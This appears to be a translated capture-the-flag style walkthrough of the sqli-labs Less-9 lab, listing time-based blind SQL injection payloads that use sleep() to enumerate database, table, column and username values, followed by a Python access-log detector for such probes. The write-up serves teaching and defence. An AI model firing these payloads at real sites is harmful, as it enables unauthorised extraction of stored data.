Less-9 (time-based blind injection)
1. The front-end page shows no visible change for any input.
2. Use a time delay to determine the closing character
?id=1' and sleep(5) -- - # delays 5 s
?id=1" and sleep(5) -- -
?id=1 and sleep(5) -- -
?id=1') and sleep(5) -- -
?id=1") and sleep(5) -- -
3. Injection logic
?id=1' and if((database()='security'),sleep(5),1)-- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -
4. Brute-forcing the database name
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='a',sleep(3),1)-- -
?id=1' and if(substr((select schema_name from information_schema.schemata limit 0,1),1,1)='i',sleep(3),1)-- -
5. Brute-forcing table names
?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='a',sleep(3),1)-- -
?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(3),1)-- -
6. Brute-forcing column names
?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='a',sleep(3),1)-- -
?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i',sleep(3),1)-- -
7. Brute-forcing values
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=1,sleep(3),1)-- -
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))=68,sleep(3),1)-- - # 68 is uppercase D
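Every probe above depends on sleep() and on a response that takes measurably longer than normal, and extracting even one value takes many requests from the same client, so the access log is a natural place to catch it. The following is an added example, not part of the original write-up: it assumes a constructed log format (combined log fields plus request duration in seconds as the last field) and constructed sample lines mirroring the payloads above.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Tokens characteristic of MySQL time-based probes: sleep()/benchmark(), often inside if().
TIME_PATTERNS = [re.compile(p, re.I) for p in (
    r"\bsleep\s*\(", r"\bbenchmark\s*\(", r"\bif\s*\(.*,\s*sleep\s*\(")]

# Assumed (constructed) access-log format: combined log fields, then request duration in seconds.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ (?P<secs>[\d.]+)$')

def analyze(line, slow_threshold=2.5):
    """Return a verdict dict for one log line, or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = []
    # parse_qsl percent-decodes each value, so %27 / %20 become ' and space before matching
    for name, value in parse_qsl(urlsplit(m.group("uri")).query, keep_blank_values=True):
        if any(pat.search(value) for pat in TIME_PATTERNS):
            hits.append(name)
    secs = float(m.group("secs"))
    return {"ip": m.group("ip"), "params": hits, "secs": secs,
            "suspicious": bool(hits), "slow": secs >= slow_threshold}

def flag_sources(lines, min_hits=2):
    """IPs with at least min_hits requests that are both suspicious and slow.

    A single slow request can be noise; repeated sleep() probes that really delayed the
    server are the signature of character-by-character enumeration."""
    counts = {}
    for line in lines:
        v = analyze(line)
        if v and v["suspicious"] and v["slow"]:
            counts[v["ip"]] = counts.get(v["ip"], 0) + 1
    return {ip: n for ip, n in counts.items() if n >= min_hits}

# Constructed sample lines (not real traffic) following the probes in this write-up.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /Less-9/?id=1 HTTP/1.1" 200 512 0.004',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /Less-9/?id=1%27%20and%20sleep(5)%20--%20- HTTP/1.1" 200 512 5.012',
    '10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /Less-9/?id=1%27%20and%20if((database()=%27security%27),sleep(5),1)--%20- HTTP/1.1" 200 512 5.009',
    '10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /Less-9/?id=1%27%20and%20if(ascii(substr((select%20username%20from%20security.users%20limit%200,1),1,1))=68,sleep(3),1)--%20- HTTP/1.1" 200 512 3.010',
    '10.0.0.9 - - [01/Jan/2024:10:00:12 +0000] "GET /Less-9/?id=1%27%20and%20sleep(5)%20--%20- HTTP/1.1" 403 0 0.003',
]

if __name__ == "__main__":
    print(flag_sources(SAMPLE_LOG))
```

The last sample line shows the distinction the two flags give: a sleep() payload that was rejected quickly is suspicious but not slow, so a filter that only keys on duration would miss it while one that only keys on the token cannot tell whether the query actually reached the database.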
Copyright belongs to the original author, 不知名白帽. If this infringes your rights, please contact us for removal.